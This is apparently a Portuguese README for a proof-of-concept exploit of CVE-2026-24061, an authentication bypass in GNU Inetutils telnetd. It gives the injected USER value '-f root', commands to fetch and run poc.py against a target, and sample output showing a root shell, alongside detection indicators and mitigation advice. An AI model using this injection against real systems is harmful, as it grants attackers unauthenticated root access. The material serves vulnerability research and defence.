
CVE-2026-24061 Bypass de Autenticação no Telnetd do GNU Inetutils
CVE: CVE-2026-24061
Severidade: Crítica
CVSS: 9.8 (Crítica)
CWE: CWE-88 — Neutralização Incorreta de Delimitadores de Argumentos em um Comando
Componente Afetado: telnetd do GNU Inetutils
Versões Afetadas: 1.9.3 até 2.7
CVE-2026-24061 é uma vulnerabilidade crítica de bypass de autenticação na implementação do servidor Telnet fornecida pelo GNU Inetutils. A vulnerabilidade origina-se da validação insuficiente da variável de ambiente USER controlada pelo cliente quando o login automático do Telnet está habilitado. Um valor malicioso pode ser interpretado como uma opção para o programa de login do sistema, em vez de um nome de usuário. Em configurações vulneráveis, um atacante remoto não autenticado pode abusar desse comportamento para invocar o login com a opção -f e contornar a autenticação, obtendo potencialmente um shell com os privilégios da conta solicitada.
Quando o serviço Telnet afetado está sendo executado com privilégios de root, a exploração bem-sucedida pode resultar em acesso remoto root não autenticado.
O fluxo de execução vulnerável pode ser resumido como:
Cliente Telnet
│
│ USER=-f root
▼
telnetd
│
│ constrói argumentos do login
▼
login -f root
│
│ bypass de autenticação
▼
shell root
O problema é acionado pela interação entre a funcionalidade de login automático do Telnet e o tratamento da variável de ambiente USER.
O valor controlado pelo atacante:
-f root
não é tratado estritamente como um nome de usuário. Em vez disso, ele pode se tornar um argumento para o login, resultando em um comportamento equivalente a:
login -f root
A opção -f instrui o login a ignorar o processo normal de autenticação para o usuário especificado.
O repositório inclui uma prova de conceito em Python 3 que realiza a conexão Telnet, lida com a negociação de protocolo necessária, injeta o valor USER malicioso e verifica a sessão resultante.
git clone https://github.com/Ish3ng0m4/CVE-2026-24061-Telnetd.git
cd CVE-2026-24061-Telnetd
chmod +x poc.py
python3 poc.py <ALVO> <PORTA>
wget https://raw.githubusercontent.com/Ish3ng0m4/CVE-2026-24061-Telnetd/main/poc.py
Torne o PoC executável:
chmod +x poc.py
Execute-o fornecendo o endereço do alvo e a porta Telnet:
python3 poc.py <ALVO> <PORTA>
python3 poc.py 127.0.0.1 23
Exploração Bem-Sucedida
CVE-2026-24061 - Bypass de Autenticação do telnetd do GNU Inetutils
[*] Alvo: 127.0.0.1:23
[+] Conectado
[*] USER=-f root injetado
[+] VULNERÁVEL
O PoC então fornece uma sessão interativa.
id
uid=0(root) gid=0(root) groups=0(root)
Isso confirma que o mecanismo de autenticação do Telnet foi contornado e a sessão resultante possui privilégios de root.
O exploit realiza as seguintes operações:
Conecta-se ao serviço Telnet do alvo. Realiza a negociação de protocolo Telnet necessária. Habilita o comportamento de login automático necessário para a exploração. Fornece o valor malicioso USER=-f root. Permite que a implementação vulnerável do telnetd passe o valor manipulado para o login. Recebe a sessão resultante. Fornece um terminal interativo ao operador.
O PoC não depende de credenciais para o caminho de autenticação vulnerável.
A exploração depende da configuração do alvo e da interação entre o telnetd e a implementação de login do sistema.
As condições principais são:
telnetd do GNU Inetutils dentro da faixa de versões afetadas.
Serviço Telnet acessível ao atacante.
Funcionalidade de login automático habilitada ou disponível.
Tratamento vulnerável da variável de ambiente USER.
Uma implementação de login compatível, capaz de interpretar a opção injetada.
Consequentemente, a presença de uma versão afetada do Inetutils por si só não deve ser tratada como prova de explorabilidade. Patches de distribuição e configuração do serviço também devem ser considerados.
CVE-2026-24061 pode comprometer completamente um sistema vulnerável.
Dependendo dos privilégios sob os quais o telnetd opera, a exploração pode fornecer:
Bypass de autenticação
Acesso não autorizado a contas locais
Execução remota de comandos
Escalada de privilégios
Acesso de nível root
Comprometimento completo do sistema
O cenário de maior risco é um serviço Telnet acessível remotamente onde a exploração resulta em uma sessão root.
Indicadores potenciais de exploração incluem:
Conexões inesperadas para TCP/23.
Tentativas de autenticação Telnet usando nomes de usuário incomuns.
Valores USER suspeitos começando com opções de linha de comando.
Argumentos inesperados do processo de login.
Sessões root originadas do telnetd.
Processos inesperados gerados pelo serviço Telnet.
O monitoramento de rede também deve identificar sistemas que expõem serviços Telnet desnecessariamente.
A resposta recomendada é remover o Telnet e usar SSH para administração remota.
Se o Telnet não puder ser removido imediatamente:
Atualize para uma versão fornecida pelo fornecedor que contenha a correção de segurança.
Aplique a atualização de segurança apropriada do sistema operacional.
Restrinja TCP/23 a redes de gerenciamento confiáveis.
Evite a exposição direta do Telnet a redes não confiáveis.
Monitore a autenticação Telnet e a atividade de processos.
Como as distribuições Linux podem aplicar backports de correções de segurança sem alterar o número da versão upstream, os administradores devem verificar o status de segurança do pacote de sua distribuição em vez de confiar apenas na versão exibida.
A vulnerabilidade foi reproduzida com sucesso contra um serviço Telnet vulnerável do GNU Inetutils executando no Ubuntu 22.04.5 LTS.
O PoC estabeleceu uma conexão com TCP/23, injetou:
USER=-f root
e obteve uma sessão root.
A verificação de privilégios retornou:
uid=0(root) gid=0(root) groups=0(root)
Isso fornece confirmação direta do impacto de segurança.
Esta prova de conceito é fornecida para pesquisa de segurança, validação de vulnerabilidades, testes de penetração autorizados e fins educacionais.
Teste apenas sistemas para os quais você possui autorização explícita.
Gabriel D. Ishengoma
Segurança Ofensiva · Pesquisa em Cibersegurança · Perícia Digital